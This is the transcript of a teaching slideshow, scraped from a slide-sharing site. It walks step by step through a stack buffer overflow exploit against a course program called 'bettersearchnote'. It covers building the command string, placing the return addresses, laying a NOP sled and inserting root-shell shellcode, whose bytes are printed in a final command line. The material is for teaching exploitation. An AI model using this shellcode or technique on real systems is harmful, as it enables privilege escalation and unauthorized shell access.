Buffer overflow walk through
Download
1 / 26

Buffer Overflow Walk-Through - PowerPoint PPT Presentation


  • 116 Views
  • Uploaded on

Buffer Overflow Walk-Through. The Code. Change name of notesearch program in our exploit code to match course naming convention. strcpy (command, “./bettersearchnote.exe\’”);. b ettersearchnote.exe. 16.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Buffer Overflow Walk-Through' - senwe


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

The code
TheCode


Change name of notesearch program in our exploit code to match course naming convention
Change name of notesearch program in our exploit code to match course naming convention

strcpy(command, “./bettersearchnote.exe\’”);

bettersearchnote.exe

16


Change name of notesearch program in our exploit code to match course name in convention
Change name of notesearch program in our exploit code to match course name in convention


Normally jose runs bettersearchnote program to search for notes with keywords of his choosing
Normally, Jose runs bettersearchnote program to search for notes with keywords of his choosing

[email protected] $ ./ bettersearchnote.exe “Life”

Life Sucks


The exploit program is crafted to run the program on his behalf using the function system
The exploit program is crafted to run the program on his behalf, using the function “system()”

[email protected] $ ls

unix_basicsbooksrc work desktop ec310code

For example system(“ls”) would list the content of the current directory as though it was run from the command line

  • }

like this except no one ever enters this at the command prompt


The exploit program is crafted to run the program on his behalf using the function system1
The exploit program is crafted to run the program on his behalf, using the function “system()”

[email protected] $ ./system_example.exe

unix_basicsbooksrc work desktop ec310code

system_example.c

#include…

int main() {

system(“ls”);

}


Now lets look at what the exploit program does
Now, lets look at what the exploit program does… behalf, using the function “system()”

Standard inclusion of C libraries


The goal of our exploit program is to open a root shell
The goal of our exploit program is to open a root shell behalf, using the function “system()”

This is machine language that opens a shell prompt for the user running the program


First the set up
First, the set-up… behalf, using the function “system()”

This is the standard way to start a program and take in command line arguments…

But you already knew that


Building the stack
Building the stack… behalf, using the function “system()”

These lines declare the variables to be used in the program

Address

buffer

Address

command

Integer

Variables are placed on the stack for the main function

offset270

Integer

ret

Address

ptr

Integer

i


Allocating memory on the heap for our string command which will be called by the function system
Allocating memory on the heap for behalf, using the function “system()” our string command, which will be called by the function system() .

Allocates 200 bytes on the heap for the string command

0x__

200 Bytes

The address of this location on the heap becomes the value of the pointer

command

buffer

command&command

offset 270

This string will eventually be run with the function system()

ret

ptr

i


Allocating memory on the heap for our string command which will be called by the function system1
Allocating memory on the heap for behalf, using the function “system()” our string command, which will be called by the function system().

The bzero function places 200 0x00’s starting at the location to which command points

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

200 Bytes

buffer

command&command

offset270

ret

ptr

i


Building the string c ommand
Building behalf, using the function “system()” the String command

This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointer

command

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

00 00 00 00

. / b e

t t e r

s e a r

c h n o

t e . e

x e ‘

00 00 00 00

00 00 00 00

buffer

command&command

offset 270

ret

ptr

i


Next we need to find the address where the command line arguments for bettersearchnote will start

This string will eventually overflow the behalf, using the function “system()” bettersearchnote buffer, have the program execute our malicious code, and open a shell

Next we need to find the address where the command line arguments for bettersearchnotewill start!

Take the number of bytes in the current string command, until the null terminator (24 bytes).

Add this to the address pointed to by the variable command

and store that address in the pointer buffer.

. / b e

t t e r

s e a r

c h n o

t e . e

x e ‘

00 00 00 00

00 00 00 00

24

Bytes

+

buffer

&command

command &command

offset 270

ret

ptr

i


Specifying our custom return address
Specifying our custom return address behalf, using the function “system()”

. / b e

t t e r

s e a r

c h n o

t e . e

x e ‘

00 00 00 00

00 00 00 00

This takes the command line argument to create our own custom offset value, but it is not used.

buffer &command+24

command &command

offset 270

ret

ptr

i


Specifying our custom return address1
Specifying our custom return address behalf, using the function “system()”

This takes the address of i

and subtracts the value of offset.

This value is placed in the variable ret

. / b e

t t e r

s e a r

c h n o

t e . e

x e ‘

00 00 00 00

00 00 00 00

, this value represents the address of our desired shell code execution entry point.

buffer &command+24

- 270

command &command

offset 270

ret

ptr

&i

i


And place enough copies of our custom return address in the buffer to overwrite the original return address.

. / b e

t te r

s e a r

c h n o

t e . e

x e . ‘

00 00 00 00

00 00 00 00

00 00 00 00

Takes the address contained in ret and places it in the address pointed to by the buffer.

This repeats every 4 bytes for 40 iterations.

buffer &command+24

command &command

offset 270

&i - 270

&i - 270

&i - 270

ret &i-270

ptr

i


Now the entire heap looks like this
Now the entire heap looks like this buffer to overwrite the original return address.


Next create a buffer of filler commands called nops to help find the shell code
Next create a buffer of filler commands, called NOPs, to help find the shell code

. / b e

t te r

s e a r

c h n o

t e . e

x e . ‘

&I - 270

&I - 270

&i - 270

ret 0x I – addr - 270

&i- 270

&i - 270

&i- 270

&i - 270

&i- 270

memset() sets a byte in memory to the value specified.

In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well.

0x90

0x90

0x90

0x90

0x90

0x90

0x90

0x90

buffer &command+24

command &command

0x90 is machine code for “No Operation,” Which literally means do nothing.

offset 270

ret &i-270

ptr

i


Now the entire heap looks like this1
Now the entire heap looks like this help find the shell code

NOP sled


Then place our shell code into the buffer immediately following the nops
Then place our shell code into the buffer immediately following the NOPs

. / b e

t te r

s e a r

c h n o

t e . e

x e . ‘

0x90 0x900x900x90

0x90 0x900x900x90

0x90 0x900x900x90

ret 0x I – addr - 270

ret 0x I – addr - 270

ret 0x I – addr - 270

ret 0x I – addr - 270

ret 0x I – addr - 270

ret 0x I – addr - 270

buffer &command+24

command &command

Copies the shell code into memory after the NOP sled

offset 270

ret &i-270

ptr

i


Now the entire heap looks like this2
Now the entire heap looks like this following the NOPs

With the newly inserted shell code here


Close the string command with a quote so it is ready to be run by the function system
Close following the NOPsthe string command with a quote so it is ready to be run by the function system()

Concatenates a single quote at the end of the string

command


Now the string command is finished and ready for execution
Now following the NOPsthe string command is finished and ready for execution.

[email protected] $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’


e following the NOPsxploit_notesearch

bettersearchnote.exe

searchstring

100 characters allotted to searchstring by bettersearchnote.exe

fd

exploit_notesearchcommand buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space.

printing

user id

sfp

return address

Ensuring one of our custom return addresses replaces the original return address


ad